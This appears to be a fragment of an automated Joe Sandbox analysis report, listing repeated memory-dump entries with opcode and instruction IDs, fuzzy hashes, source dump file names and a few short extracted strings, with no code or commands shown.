                              • Instruction ID: fb22badeae7eeee8d1433f42bfba9f67721ff68970b8887ce53ec6a6fd21a4ca
                              • Opcode Fuzzy Hash: ce2ccc3834a90025a1eb054f74fdd4c8b2b3c1e5233ddbe959ae160bab64de40
                              • Instruction Fuzzy Hash: 8EE0C071E0DB4C4FDF50AB9DA8345D83BA0FFC5314F040069F01CC3290D6215A50C341
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1fb07ab14b8a4964597cfc65d1dfdc666c16d2f51b2d0cf0fb20ec65ed5e1a64
                              • Instruction ID: 958a84d97f0bd86f22ba0ee33f60536af6aaf2db04b10e54a316815698d519c9
                              • Opcode Fuzzy Hash: 1fb07ab14b8a4964597cfc65d1dfdc666c16d2f51b2d0cf0fb20ec65ed5e1a64
                              • Instruction Fuzzy Hash: 91E0C222F4680E09EB24B3B42C3A9FDF299DFC8218FC20971E01DC20CBCD5929154181
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                              • Instruction ID: e5965208f877094447507044449f839a821f1d2bd8a8e75c1a70ada562594516
                              • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                              • Instruction Fuzzy Hash: C8D01772F0E51D5CF568A38874231FC7388EF82234A92003FD28F825B2AC8E3212118A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 886f27523a047f1f5a740b7e9cd71d59e943b578767e433b858897b1e4baa529
                              • Instruction ID: 00e8da02c58b0c4c7a4f2eb67657ced809df25767409abcc067faf20571d235d
                              • Opcode Fuzzy Hash: 886f27523a047f1f5a740b7e9cd71d59e943b578767e433b858897b1e4baa529
                              • Instruction Fuzzy Hash: 08E0C222F5580E09EB54B3B42C3A9FDF249DFC8218BC10972E41DC20CBCD5929158181
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e622298edd6d791495b2766822398563c4a876d5dcecad5d8849d2b245a98c18
                              • Instruction ID: b46748e683eda8656a124bb9474272202a9f2bfda9e551510b053b90ae82aa7a
                              • Opcode Fuzzy Hash: e622298edd6d791495b2766822398563c4a876d5dcecad5d8849d2b245a98c18
                              • Instruction Fuzzy Hash: 9CE08C30609A084B8748EA2C848C92BBFE4DBEC365F180B3FB40CD3270DA7086808789
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                              • Instruction ID: 8e233fc25587696708e9e2ab1b081aef437669b4872b14cf0b460aba26942c5f
                              • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                              • Instruction Fuzzy Hash: 74D06222B5F91D49ED786384B8232FC7291EBC5631B531277E14E814A29C9925151185
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ff1d7bb294560a33adac2afba5c03a4d1fd815d0b067b69062a33a0c0f14e3a
                              • Instruction ID: f9d73e03278d48688c17c4a1207327c781293d005570ecfb1a49aab72280b7e2
                              • Opcode Fuzzy Hash: 1ff1d7bb294560a33adac2afba5c03a4d1fd815d0b067b69062a33a0c0f14e3a
                              • Instruction Fuzzy Hash: 46D02B12F0180E0DEB54B3B43C2A5FDF245EFC8218BC10431E01DC31D7DD6915114181
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db1d85f38c52b1d99da28fa096a8bbbedea5f97d3afb57e999b55014f5bf4a05
                              • Instruction ID: 61eb8acec06bb8e25eedc01145384c3519fe1a2d8c6b84e3aed109223dff7eb7
                              • Opcode Fuzzy Hash: db1d85f38c52b1d99da28fa096a8bbbedea5f97d3afb57e999b55014f5bf4a05
                              • Instruction Fuzzy Hash: 79D01221E28E1D4BDBB8FB7850557B6B1E0FF18318F410A69D05AC35C9DF68AE854384
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f94574517017f2bc6fb2aa60c78e6c29992320d7d0204074f89d6cc7041b0121
                              • Instruction ID: 1a899354cbe33e8b1c9761151a29f1c696f9caeebdf54236614c3a0e847161e1
                              • Opcode Fuzzy Hash: f94574517017f2bc6fb2aa60c78e6c29992320d7d0204074f89d6cc7041b0121
                              • Instruction Fuzzy Hash: FBD05E61B22E0D4BF74CA77A0C9D26536D3EBDC605F858179A408C22E6ED78A9924748
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f38d0ce35c557be7dd6a436a94e76bb62aa08376fca2af48155e977f916ac58a
                              • Instruction ID: d08f665407979bd157e67bd064c4fa4e9e1b8ed7082879ebf3682f8127a66d7b
                              • Opcode Fuzzy Hash: f38d0ce35c557be7dd6a436a94e76bb62aa08376fca2af48155e977f916ac58a
                              • Instruction Fuzzy Hash: E5D02B62E4F2560BE762D65C74E0499B7C08B10750F4001B9C08486096D85C514AC651
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e4439172462762177387768cb6deefa197d9f9bfcb600c2d7b2edae2388f87b
                              • Instruction ID: cf129d06e007e8d0bd3675c10cf242ebfecd257b4f9f2f43a06b5ba0c41a50cf
                              • Opcode Fuzzy Hash: 1e4439172462762177387768cb6deefa197d9f9bfcb600c2d7b2edae2388f87b
                              • Instruction Fuzzy Hash: F1C0801374D90E05FAB1E68CF4615E9F3C1DB507A1F510272D084C01A7EC8967474381
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5d41e437983518334ba4f86bdba3c0eed54524584d1071d92576d05defbf8e79
                              • Instruction ID: e51e54dc2fd4269aa4f31674f600d9606b7de50e3e9fa7623c4e585c7ffeaf93
                              • Opcode Fuzzy Hash: 5d41e437983518334ba4f86bdba3c0eed54524584d1071d92576d05defbf8e79
                              • Instruction Fuzzy Hash: 7FD0127251CB094BC3149B54E4508DAB7A0FB84364F440B39E0AA912E5DB689381C686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a37279a9e4a0aa64f27d26e54b123e9ceded54e91e237c97a0a0c78415ab6f7b
                              • Instruction ID: 10760e95994aef8b6f085d644932dbd8ebf5e3eac3512b3ff2114085e919bbd3
                              • Opcode Fuzzy Hash: a37279a9e4a0aa64f27d26e54b123e9ceded54e91e237c97a0a0c78415ab6f7b
                              • Instruction Fuzzy Hash: 6DD05E3192CB094BD354DF14E4508DAB7A0FFC4720F840B2DF0AE862E5EEB4D282C686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 46cfca83629c8835618dc03c3a20ad405c0c92c5caef1e3222e5d33789e6e066
                              • Instruction ID: cd53a0cebf95c851bb8e89d0d1a0f33ee959b201d49b8a69a53fce9e5029f73a
                              • Opcode Fuzzy Hash: 46cfca83629c8835618dc03c3a20ad405c0c92c5caef1e3222e5d33789e6e066
                              • Instruction Fuzzy Hash: 27C0803375D60E06EAE5934CF0D56E6B3C0D750250F950172D044C11D7EC4D75875380
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f81b0d5ec6bbcdc92bfc1ed63ac81ef3694b23700a24cc0943b5fc754b8c8ada
                              • Instruction ID: 634817136201ba6c1ae0f6f1dd12376ffef5573a934a29be15ce76f4588cad62
                              • Opcode Fuzzy Hash: f81b0d5ec6bbcdc92bfc1ed63ac81ef3694b23700a24cc0943b5fc754b8c8ada
                              • Instruction Fuzzy Hash: BFD0A922B0D40E47EB205B8CA4A00E8B380AFB0310F4201B4E08C960AADEE83A828280
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b26aa93847fe150453eb0f068ad9163b7047a756ab7b53085609233fcd73493
                              • Instruction ID: 5ffd341d823888de2c489e0c9b9139b4379b559aa88a97922b5d4a6b3dde7683
                              • Opcode Fuzzy Hash: 6b26aa93847fe150453eb0f068ad9163b7047a756ab7b53085609233fcd73493
                              • Instruction Fuzzy Hash: 67C0C02370EB1D03EFA0D34CF0402DEB3C0CB443A0F800172D084C00ADDE9A55838280
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe26b11fcb36ac287e02040090526c775c6657893640264e3ea706fb83b69999
                              • Instruction ID: 5d760f6b06f33f6169a035f19dbec486fa7377a1dde35a84e9f76859e472c12f
                              • Opcode Fuzzy Hash: fe26b11fcb36ac287e02040090526c775c6657893640264e3ea706fb83b69999
                              • Instruction Fuzzy Hash: 67C02222A0D90A42EAE09748F8211E6B3C0EB402A0FA00071E04880091DF6A66528280
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c4ef60a3f142c0a28a0333bc45e34125bbb60aebbb7c7fe84b94706babdbcb65
                              • Instruction ID: 6fbd9669900479ea5cdc88b636a6b9b7be7ee508e46ef912fc9db879dec3b2ee
                              • Opcode Fuzzy Hash: c4ef60a3f142c0a28a0333bc45e34125bbb60aebbb7c7fe84b94706babdbcb65
                              • Instruction Fuzzy Hash: 35C02223D0870A0ADAA0DB0CB4015DAB3C0E740240FC10072E018930A2FD48664A8781
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6aec6070f675a79a7fa84f67455005a6ad5133222aade14e68b0e3209bfd0d38
                              • Instruction ID: b40b581c46cf4002067d4a68cbe22f7c73a84039bde0f315ad81d1b57c77727c
                              • Opcode Fuzzy Hash: 6aec6070f675a79a7fa84f67455005a6ad5133222aade14e68b0e3209bfd0d38
                              • Instruction Fuzzy Hash: EEC04C11B1D93E06E660569C7C511A8A28197945207651677D40AC1299D859598111D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa8b65b3006ea8202ffe90280ca68a1306d14b8a65b926797a371e1ea15915b3
                              • Instruction ID: 2c54de1195d568e828d47a7b474d6fcd6699a264983af2dca5a31b41e16f0bbf
                              • Opcode Fuzzy Hash: fa8b65b3006ea8202ffe90280ca68a1306d14b8a65b926797a371e1ea15915b3
                              • Instruction Fuzzy Hash: EBC09B11F1D93E06E57056DC7C511BCA381D7D45707A51777D40FC129DDC5D5D4111D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c5d238561132fdab085688497e784428c09be716237a35d6f48b84b19564719
                              • Instruction ID: 12f1f979288c1c7ff90ed4e88ccd824a83c8cca418ead8408872d355269f431c
                              • Opcode Fuzzy Hash: 2c5d238561132fdab085688497e784428c09be716237a35d6f48b84b19564719
                              • Instruction Fuzzy Hash: 29C09B11F1E93E06E670569C7C611B8A381D7C45317651777D40EC129DDC9D5DD111C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc829645f89fd517edc5882a4a9122e5814abbe719e6d66802dc693986b6723a
                              • Instruction ID: 3cdfab8557d9cbab5632bf3b18493a0e886317d3725ee41b56fc9d8fb19c593d
                              • Opcode Fuzzy Hash: fc829645f89fd517edc5882a4a9122e5814abbe719e6d66802dc693986b6723a
                              • Instruction Fuzzy Hash: 69C0123252D64957D345A740E4518EB7351BFD0200F801F39F05A4109DDD5966458583
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef7054e3d1ea0e2e9a01662d0d2a598c51c37546175fc44bd07dd953fca81d90
                              • Instruction ID: 8e618836ab21aacbdc1fc135c2c6c174e6ae0bf0ef2bf0e8ff8ca5f3dfa72c26
                              • Opcode Fuzzy Hash: ef7054e3d1ea0e2e9a01662d0d2a598c51c37546175fc44bd07dd953fca81d90
                              • Instruction Fuzzy Hash: 29C09221B1AC2C1A47B8A22D1859A7A14DACBED62171A42ABA40CD32A9DDA44C4643D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24f1cca51add04ce72aea0eb7bd34eed35ebbd9096a9ca4a8fa764f20159e548
                              • Instruction ID: 56a79bada3a820c90ae7dfe0a52bc210c6c454210e5662da5f0346f65b01de93
                              • Opcode Fuzzy Hash: 24f1cca51add04ce72aea0eb7bd34eed35ebbd9096a9ca4a8fa764f20159e548
                              • Instruction Fuzzy Hash: B3C08013E5D60A15EFB58348B0D55B913D0D790350F950176B055C01E6EC4991874541
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60a62728fc690bda5e4c212fd73d19d2d72a15c2183dc9853c89fda1982ca33b
                              • Instruction ID: 8b044eb3f17268000a7fc6891e40c4e6952fb134262485b7e2bdd4f0b8d53eb4
                              • Opcode Fuzzy Hash: 60a62728fc690bda5e4c212fd73d19d2d72a15c2183dc9853c89fda1982ca33b
                              • Instruction Fuzzy Hash: 4DB09227B4A50EC5EA3012C879120FDB390DB80276F121233D30D91452899A22664181
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                              • Instruction ID: 1b7c1ffd341fe88f9962cb31fce54cb5380bbce79d21dad44c5123a0c3ddc668
                              • Opcode Fuzzy Hash: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                              • Instruction Fuzzy Hash: C4B09237B4A00E85EA3122C674220FDB318EB802B6F52027BE20D810618D8722254191
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da2bdc384ec007012a236b9633edbef1f0c769441daa823e4bd76c50011e60c6
                              • Instruction ID: d0c34a51238ea3d0ecee6e1970a27612f376363b10dbe34ec8d911fe84e05892
                              • Opcode Fuzzy Hash: da2bdc384ec007012a236b9633edbef1f0c769441daa823e4bd76c50011e60c6
                              • Instruction Fuzzy Hash: D9B01233F4041985EF0469C8B4012EDB314DB80365F001573E23CC10829956142401D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31c6f5a480554e8d6fba1952b767324e6b35a37b521423bfc3c091d68fb2f836
                              • Instruction ID: d1b0d667bff44b09ec7da80db3f7ea48559e055545f60572be7a65140aef2141
                              • Opcode Fuzzy Hash: 31c6f5a480554e8d6fba1952b767324e6b35a37b521423bfc3c091d68fb2f836
                              • Instruction Fuzzy Hash: EBC09231929B1849E350BB34894E4ABBAE0DFA8299F040F3BAC49D1079FD60968446D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67a8537ef7a78c6baaa35df4087cde2becdf2800a1bbc0ae2ea82b62d591aa64
                              • Instruction ID: 5c3d0b4b72592d2549601487858126e9f7128f7e22eaed586d96c3f58edb9f4e
                              • Opcode Fuzzy Hash: 67a8537ef7a78c6baaa35df4087cde2becdf2800a1bbc0ae2ea82b62d591aa64
                              • Instruction Fuzzy Hash:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2806d0cdf2f89e587b1780457a1afe18073251eac7b753b99814b476ab0e528f
                              • Instruction ID: 27eff6eb79ded2cf5cd6027ff626ea2aace502ecf80eb7e77908edb283471150
                              • Opcode Fuzzy Hash: 2806d0cdf2f89e587b1780457a1afe18073251eac7b753b99814b476ab0e528f
                              • Instruction Fuzzy Hash:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f09a29de5b4551ce8d1c4c4bcef2128230de4381bfa0a1101002c5d448752d56
                              • Instruction ID: 680b26d615a9ecbd320d42e6fac9e574bae2a1d602307e36f5cca7a4b7a9af0d
                              • Opcode Fuzzy Hash: f09a29de5b4551ce8d1c4c4bcef2128230de4381bfa0a1101002c5d448752d56
                              • Instruction Fuzzy Hash:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 75177751bbdf7ad8f88f71baad76fc35ad4ecb6dc0368d34e59d7da5ec94666f
                              • Instruction ID: 212f3a889909e4e0749e6c111694895feff7091c5493d478d937f4b2cad415ef
                              • Opcode Fuzzy Hash: 75177751bbdf7ad8f88f71baad76fc35ad4ecb6dc0368d34e59d7da5ec94666f
                              • Instruction Fuzzy Hash:
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q/
                              • API String ID: 0-336996232
                              • Opcode ID: fa6d3c610c44346945e9296f34e5d6f45ab5a843a2e6ba1df3d0c8f3995cff0c
                              • Instruction ID: 293213425104b8dbc547c183b9826c7d96d470594d1664a8a5d149c98a4cb1dd
                              • Opcode Fuzzy Hash: fa6d3c610c44346945e9296f34e5d6f45ab5a843a2e6ba1df3d0c8f3995cff0c
                              • Instruction Fuzzy Hash: 1822F671B09A4E8FDB98DF68C4A56A977E1FF69310B1141BED009C72E6DE74AC42CB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d/q
                              • API String ID: 0-4223035929
                              • Opcode ID: fc315a84e363e3fca8090adae91b616efbe3422f2dd7bf91e0ead411538a5b4c
                              • Instruction ID: 8aefd50ab16c3dc5e0dcce15b2e842423ebc9aa55eee08f343a4bb6bf71267d5
                              • Opcode Fuzzy Hash: fc315a84e363e3fca8090adae91b616efbe3422f2dd7bf91e0ead411538a5b4c
                              • Instruction Fuzzy Hash: 4302E731A0AA4D4FEB98DFA888647EE77D1FF49315F1501B9D41EC71E6CA35A902C740
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q/
                              • API String ID: 0-336996232
                              • Opcode ID: b63a5458cf75c2f05d32de8a92194a6a18ab8981a45e3c3b40ad34d2631269ee
                              • Instruction ID: b95556616f78a768dc3dabc846154607468cef5cf961f53fbbd59704887b5ac4
                              • Opcode Fuzzy Hash: b63a5458cf75c2f05d32de8a92194a6a18ab8981a45e3c3b40ad34d2631269ee
                              • Instruction Fuzzy Hash: F2C12771B0EA598FD798DB7C84A56A877E2FF69350B0541BED009CB2E3DE696C02C740
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef7cb3c32048ce0beb8ef32a124785ecf080dc9238f8b5d1568c232ddd9437fb
                              • Instruction ID: a758aacc3b52b0ca33271e483130f98dfce37201fcc084a729ff821fd9ecbf52
                              • Opcode Fuzzy Hash: ef7cb3c32048ce0beb8ef32a124785ecf080dc9238f8b5d1568c232ddd9437fb
                              • Instruction Fuzzy Hash: BD914712A0E7CA1BE329A6BC58754E83F909F1A33971902FBE4DDCE1EBDC186945C341
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2ce14a1879abb38a14eaef9893e1fb1bec1bf7ea186f4a225d5a990fd6d7573
                              • Instruction ID: fc88f9a9b9ba02999ef8d3b8a2317c1d7ac3db5e0e69fc49ecc86e080f1c549e
                              • Opcode Fuzzy Hash: e2ce14a1879abb38a14eaef9893e1fb1bec1bf7ea186f4a225d5a990fd6d7573
                              • Instruction Fuzzy Hash: F381B453A0FBC61BF37286B848351A97F526F9229471E00FBD0D44B5BFEA19BA04C385
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
